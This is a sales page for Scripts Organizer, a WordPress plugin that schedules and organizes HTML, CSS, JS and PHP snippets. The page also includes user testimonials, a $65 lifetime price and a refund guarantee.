Navigate fast between code blocks with sidebar list without leaving code editor. Code Navigator is available for Code Blocks and SCSS Partials. Code Block Navigator preview Code Block Navigator preview… Read more

**Organize Scripts**

Scripts List Since Scripts Organizer is WordPress native-oriented you can manage scripts the same as any other post or page. In the Scripts list, you can sort them by title… Read more

**Scripts Location**

What differs Scripts Organizer from others is that you can write Scripts and Styles inside Header and Footer and on top of that to write PHP Action or Hook or… Read more

**Shortcode**

Use flexibility to create one group of elements and reuse it across the website. Shortcode can be scheduled the same as scripts and styles. For best practice we limited shortcode… Read more

**Current Server Time**

When you are preparing scripts when to be triggered at an exact time it is important that your plan is synchronized with server time. This is especially important when you… Read more

**WordPress Native under the hood**

We are reusing using WordPress scripts, styles, classes, and functions to get the most of performance as you already loaded everything. With WordPress native look and feel learning curve will… Read more

**Themes**

Looking at the code all day long is hard so we are making constant improvements. From Dark to Light mode to switch between night and day for better contrast to… Read more

**Easy way to enable-disable scripts**

Scripts can be easily enabled-disabled by pressing toggle switch on two locations. The first one is when you editing the Scripts page. Scripts Planner > Scripts pages list > Selected… Read more

**REVIEW FROM WP EXPERTS**

_This is a very powerful plugin. Not only is it feature-rich and offers all the functionality I need, but it literally works every day for me that I use it. Developers are always listening to user suggestions, and by making changes regularly as they’re suggested, they make sure my experience stays strong. I am very pleased and lucky to have this plugin for my workflow._ 

**Andrew Choi**

Scheduling scripts on your WordPress site has never been more straightforward. With Scripts Organizer, you can schedule to run scripts (HTML, CSS, JS & PHP) only where they are needed when they are needed. Add CSS tweaks over Halloween & Black Friday for Visual Themeing or run your chatbot only during your working hours. You can pick a timeframe, select specific dates, weekdays, taxonomies & more. The scripts of your choice will be running only on the pages that match all of your specified conditions. Scripts Organizer gives you the power to schedule scripts in no time.

**Noel**

I was an early adopter of Swiss Knife Pro and Scripts Organizer and have had the privilege of watching both plugins mature into incredibly helpful tools. Both offer a unique set of features dedicated to saving WordPress creators time and augment the development experience. Aside from the features, the development and support are both best in class. The dPlugins team consistently pushes major and minor updates with helpful features, cosmetic improvements, and more. They have an active community of users and happily integrate popular requests that help users of their plugins. Support queries are answered quickly, professionally, and most importantly… actually help you solve your problem. As a WordPress Agency that uses Oxygen Builder for almost all of our projects, Swiss Knife Pro and Scripts Organizer have saved my team at Isotropic hundreds of hours in manual work, from debugging, to font management, to scheduling mission-critical scripts, and more!

**James LePage**

It paid off when I was going for my last vacation. I have scheduled a promotion banner and left my computer at home. That’s how much I trust him.

**Alexander Buzmakov**

**Unlimited websites****Unlimited support****Documentation and support****More features coming soon**

**Lifetime updates and support**

Price will rise as we add more features

**$65.00**

Buy Now:  $65.00

Payments are secured with Stripe and PayPal

**30-Day Money-Back Guarantee**

Probably you will never need this with our owesome products but here it is just in case. If you aren’t completely satisfied within 30 days of purchase, you’re more than welcome to get a full refund!

Contact support

Tag

#php